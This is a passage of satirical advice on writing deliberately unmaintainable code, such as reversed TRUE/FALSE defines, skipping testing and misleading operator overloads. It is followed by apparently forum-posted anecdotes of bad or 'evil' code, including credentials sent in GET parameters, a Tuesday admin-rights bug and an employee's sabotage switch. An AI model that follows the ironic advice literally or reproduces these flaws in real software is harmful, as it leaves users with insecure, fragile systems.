When documenting, and you need an arbitrary name to represent a filename use "file ". Never use an obviously arbitrary name like "Charlie.dat" or "Frodo.txt". In general, in your examples, use arbitrary names that sound as much like reserved keywords as possible. For example, good names for parameters or variables would be"bank", "blank", "class", "const ", "constant", "input", "key", "keyword", "kind", "output", "parameter" "parm", "system", "type", "value", "var" and "variable ". If you use actual reserved words for your arbitrary names, which would be rejected by your command processor or compiler, so much the better. If you do this well, the users will be hopelessly confused between reserved keywords and arbitrary names in your example, but you can look innocent, claiming you did it to help them associate the appropriate purpose with each variable.
Code Names Must Not Match Screen Names
Choose your variable names to have absolutely no relation to the labels used when such variables are displayed on the screen. E.g. on the screen label the field "Postal Code" but in the code call the associated variable "zip".
Choosing The Best Overload Operator
In C++, overload +,-,*,/ to do things totally unrelated to addition, subtraction etc. After all, if Stroustrup can use the shift operator to do I/O, why should you not be equally creative? If you overload +, make sure you do it in a way that i = i + 5; has a totally different meaning from i += 5; Here is an example of elevating operator overloading obfuscation to a high art. Overload the '!' operator for a class, but have the overload have nothing to do with inverting or negating. Make it return an integer. Then, in order to get a logical value for it, you must use '! !'. However, this inverts the logic, so [drum roll] you must use '! ! !'. Don't confuse the ! operator, which returns a boolean 0 or 1, with the ~ bitwise logical negation operator.
Exceptions
I am going to let you in on a little-known coding secret. Exceptions are a pain in the behind. Properly-written code never fails, so exceptions are actually unnecessary. Don't waste time on them. Subclassing exceptions is for incompetents who know their code will fail. You can greatly simplify your program by having only a single try/catch in the entire application (in main) that calls System.exit(). Just stick a perfectly standard set of throws on every method header whether they could actually throw any exceptions or not.
Magic Matrix Locations
Use special values in certain matrix locations as flags. A good choice is the [3][0] element in a transformation matrix used with a homogeneous coordinate system.
Magic Array Slots revisited
If you need several variables of a given type, just define an array of them, then access them by number. Pick a numbering convention that only you know and don't document it. And don't bother to define #define constants for the indexes. Everybody should just know that the global variable widget[15] is the cancel button. This is just an up-to-date variant on using absolute numerical addresses in assembler code.
Never Beautify
Never use an automated source code tidier (beautifier) to keep your code aligned. Lobby to have them banned from your company on the grounds they create false deltas in PVCS/CVS (version control tracking) or that every programmer should have his own indenting style held forever sacrosanct for any module he wrote. Insist that other programmers observe those idiosyncratic conventions in "his" modules. Banning beautifiers is quite easy, even though they save millions of keystrokes doing manual alignment and days wasted misinterpreting poorly aligned code. Just insist that everyone use the same tidied format, not just for storing in the common repository, but also while they are editing. This starts an RWAR and the boss, to keep the peace, will ban automated tidying. Without automated tidying, you are now free to accidentally misalign the code to give the optical illusion that bodies of loops and ifs are longer or shorter than they really are, or that else clauses match a different if than they really do. e.g.
if(a)
if(b) x=y;
else x=z;
Testing is for cowards
A brave coder will bypass that step. Too many programmers are afraid of their boss, afraid of losing their job, afraid of customer hate mail and afraid of being sued. This fear paralyzes action, and reduces productivity. Studies have shown that eliminating the test phase means that managers can set ship dates well in advance, an obvious aid in the planning process. With fear gone, innovation and experimentation can blossom. The role of the programmer is to produce code, and debugging can be done by a cooperative effort on the part of the help desk and the legacy maintenance group.
If we have full confidence in our coding ability, then testing will be unnecessary. If we look at this logically, then any fool can recognise that testing does not even attempt to solve a technical problem, rather, this is a problem of emotional confidence. A more efficient solution to this lack of confidence issue is to eliminate testing completely and send our programmers to self-esteem courses. After all, if we choose to do testing, then we have to test every program change, but we only need to send the programmers to one course on building self-esteem. The cost benefit is as amazing as it is obvious.
Reverse the Usual True False Convention
Reverse the usual definitions of true and false. Sounds very obvious but it works great. You can hide:
#define TRUE 0
#define FALSE 1
somewhere deep in the code so that it is dredged up from the bowels of the program from some file that no one ever looks at anymore. Then force the program to do comparisons like:
if ( var == TRUE )
if ( var != FALSE )
someone is bound to "correct" the apparent redundancy, and use var elsewhere in the usual way:
if ( var )
Another technique is to make TRUE and FALSE have the same value, though most would consider that out and out cheating. Using values 1 and 2 or -1 and 0 is a more subtle way to trip people up and still look respectable. You can use this same technique in Java by defining a static constant called TRUE. Programmers might be more suspicious you are up to no good since there is a built-in literal true in Java.
Exploit Schizophrenia
Java is schizophrenic about array declarations. You can do them the old C way, String x[] (which uses mixed pre-postfix notation), or the new way, String[] x, which uses pure prefix notation. If you want to really confuse people, mix the notations, e.g.
byte[ ] rowvector, colvector , matrix[ ];
which is equivalent to:
byte[ ] rowvector;
byte[ ] colvector;
byte[ ][] matrix;
I don't know if I'd call the code "evil", but we had a developer who would create Object[] arrays instead of writing classes. Everywhere.
I have seen (and posted to thedailywtf) code that will give everyone administrator rights in a significant part of an application on Tuesdays. I guess the original developer forgot to remove the code after local machine testing.
I don't know if this is "evil" so much as misguided (I recently posted it on The Old New Thing):
I knew one guy who loved to store information as delimited strings. He was familiar with the concept of arrays, as shown when he used arrays of delimited strings, but the light bulb never lit up.
Base 36 encoding to store ints in strings.
I guess the theory goes somewhat along the lines of:
Hexadecimal is used to represent numbers
Hexadecimal doesn't use letters beyond F, meaning G-Z are wasted
Waste is bad
At this moment I am working with a database that is storing the days of the week that an event can happen on as a 7-bit bitfield (0-127), stored in the database as a 2-character string ranging from '0' to '3J'.
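As a hypothetical illustration of that scheme (not the actual system's code), a 7-bit weekday mask round-trips through base 36 like this in Java; note that Integer.toString produces lower-case digits, so 127 encodes as "3j", while parsing accepts the upper-case "3J":
public class WeekdayMask {
    public static void main(String[] args) {
        int allDays = 0b1111111;                        // all seven day bits set -> 127
        String encoded = Integer.toString(allDays, 36); // "3j"
        int decoded = Integer.parseInt("3J", 36);       // 127 (digits parse case-insensitively)
        System.out.println(encoded + " / " + decoded);
    }
}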
I remember seeing a login handler that took a POST request and redirected to a GET with the user name and password passed in as parameters. This was for an "enterprise class" medical system.
I noticed this while checking some logs - I was very tempted to send the CEO his password.
Really evil was this piece of brilliant delphi code:
type
TMyClass = class
private
FField : Integer;
public
procedure DoSomething;
end;
var
myclass : TMyClass;
procedure TMyClass.DoSomething;
begin
myclass.FField := xxx; //
end;
It worked great if there was only one instance of the class. But unfortunately I had to use another instance, and that created lots of interesting bugs.
When I found this jewel, I can't remember if I fainted or screamed, probably both.
Maybe not evil, but certainly rather, um... misguided.
I once had to rewrite a "natural language parser" that was implemented as a single 5,000 line if...then statement.
as in...
if (text == "hello" || text == "hi")
response = "hello";
else if (text == "goodbye")
response = "bye";
else
...
I saw code in an ASP.NET MVC site, from a guy who had only done Web Forms before (and is a renowned copy/paster!), that stuck a client-side click event on an <a> tag that called a JavaScript method that did a document.location.
I tried to explain that a href on the <a> tag would do the same!!!
A little evil... someone I know wrote, into the main internal company web app, a daily check to see if he had logged into the system in the past 10 days. If there was no record of him logging in, it disabled the app for everyone in the company.
He wrote the piece once he heard rumors of layoffs; if he was going down, the company would have to suffer.
The only reason I knew about it is that he took a 2-week vacation and I called him when the site crapped out. He told me to log on with his username/password... and all was fine again.
Of course... months later we all got laid off.
My colleague likes to recall that ASP.NET application which used a public static database connection for all database work.
Yes, one connection for all requests. And no, there was no locking done either.
I remember having to set up IIS 3 to run Perl CGI scripts (yes, that was a looong time ago). The official recommendation at that time was to put Perl.exe in cgi-bin. It worked, but it also gave everyone access to a pretty powerful scripting engine!
Any RFC 3514-compliant program which sets the evil bit.
SQL queries right there in javascript in an ASP application. Can't get any dirtier...
We had an application that loaded all of its global state from an XML file. No problem with that, except that the developer had created a new form of recursion.
<settings>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
Then comes the fun part. When the application loads, it runs through the list of properties and adds them to a global (flat) list, along with incrementing a mystery counter. The mystery counter is named something totally irrelevant and is used in mystery calculations:
List properties = new List();
Node<-root
while node.hasNode("property")
add to properties list
my_global_variable++;
if hasNode("property")
node=getNode("property"), ... etc etc
And then you get functions like
calculateSumOfCombinations(int x, int y){
return x+y+my_global_variable;
}
Edit: clarification - it took me a long time to figure out that he was counting the depth of the recursion, because at level 6 or 7 the properties changed meaning, so he was using the counter to split his flat set into 2 sets of different types (kind of like having a list of STATE, STATE, STATE, CITY, CITY, CITY and checking if the index > counter to see whether your name is a city or a state).
Instead of writing a Windows service for a server process that needed to run constantly, one of our "architects" wrote a console app and used the Task Scheduler to run it every 60 seconds.
Keep in mind this is in .NET where services are very easy to create.
--
Also, at the same place a console app was used to host a .NET remoting service, so they had to start the console app and lock a session to keep it running every time the server was rebooted.
--
At the last place I worked one of the architects had a single C# source code file with over 100 classes that was something like 250K in size.
32 source code files with more than 10K lines of code each. Each contained one class. Each class contained one method that did "everything".
That was a real nightmare to debug before I had to refactor that code.
At an earlier workplace, we inherited a legacy project which had partially been outsourced earlier. The main app was Java; the outsourced part was a native C library. Once I had a look at the C source files, I listed the contents of the directory. There were several source files over 200K in size. The biggest C file was 600 Kbytes.
Thank God I never had to actually touch them :-)
I was given a set of programs to advance while colleagues were abroad at a customer (installing said programs). One key library came up in every program, and trying to figure out the code, I realised that there were tiny differences from one program to the next. In a common library.
Realising this, I ran a text comparison of all copies. Out of 16, I think there were about 9 unique ones. I threw a bit of a fit.
The boss intervened and had the colleagues collate a version that was seemingly universal. They sent the code by e-mail. Unknown to me, there were strings with unprintable characters in there, and some mixed encodings. The e-mail garbled it pretty bad.
The unprintable characters were used to send out data (all strings!) from a server to a client. All strings were thus separated by the 0x03 character on the server-side, and re-assembled client-side in C# using the Split function.
The somewhat sane way would have been to do:
someVariable.Split(Convert.ToChar(0x03));
The saner and friendly way would have been to use a constant:
private const char StringSeparator = (char)0x03;
//...
someVariable.Split(StringSeparator);
The EVIL way was what my colleagues chose: use whatever "prints" for 0x03 in Visual Studio and put that between quotes:
someVariable.Split('/*unprintable character*/');
Furthermore, in this library (and all the related programs), not a single variable was local (I checked!). Functions were designed either to reuse the same variables once it was deemed safe to clobber them, or to create new ones which would live on for the duration of the process. I printed out several pages and colour-coded them. Yellow meant "global, never changed by another function", red meant "global, changed by several". Green would have been "local", but there was none.
Oh, did I mention version control? Because of course there was none.
ADD ON: I just remembered a function I discovered, not long ago.
Its purpose was to go through an array of arrays of integers, and set the first and last item of each to 0. It went like this (not actual code, from memory, and more C#-esque):
FixAllArrays()
{
for (int idx = 0; idx < arrays.count- 1; idx++)
{
currArray = arrays[idx];
nextArray = arrays[idx+1];
SetFirstToZero(currArray);
SetLastToZero(nextArray);
//This is where the fun starts
if (idx == 0)
{
SetLastToZero(currArray);
}
if (idx == arrays.count- 1)
{
SetFirstToZero(nextArray);
}
}
}
Of course, the point was that every sub-array had to get this done, both operations, on all items. I'm just not sure how a programmer can decide on something like this.
Similar to what someone else mentioned above:
I worked in a place that had a pseudo-scripting language in the application. It fed into a massive method that had some 30 parameters and a giant Select Case statement.
It was time to add more parameters, but the guy on the team who had to do it realized that there were too many already.
His solution?
He added a single object parameter on the end, so he could pass in anything he wanted and then cast it.
I couldn't get out of that place fast enough.
Once, after our client teams reported some weird problems, we noticed that two different versions of the application were pointing to the same database. (While deploying the new system to them, their database was upgraded, but everyone forgot to bring down the old system.)
This was a miracle escape..
And since then, we have an automated build and deploy process, thankfully :-)
I think it was a program which loaded a loop into the general-purpose registers of a PDP-10 and then executed the code in those registers.
You could do that on a PDP-10. That doesn't mean that you should.
EDIT: at least this is to the best of my (sometimes quite shabby) recollection.
I had the deep misfortune of being involved in finding a rather insane behavior in a semi-custom database high-availability solution.
The core bits were unremarkable. Red Hat Enterprise Linux, MySQL, DRBD, and the Linux-HA stuff. The configuration, however, was maintained by a completely custom puppet-like system (unsurprisingly, there are many other examples of insanity resulting from this system).
It turns out that the system was checking the install.log file that Kickstart leaves in the root directory for part of the information it needed to create the DRBD configuration. This in itself is evil, of course. You don't pull configuration from a log file whose format is not actually defined. It gets worse, though.
It didn't store this data anywhere else, and every time it ran, which was every 60 seconds, it consulted install.log.
I'll just let you guess what happened the first time somebody decided to delete this otherwise useless log file.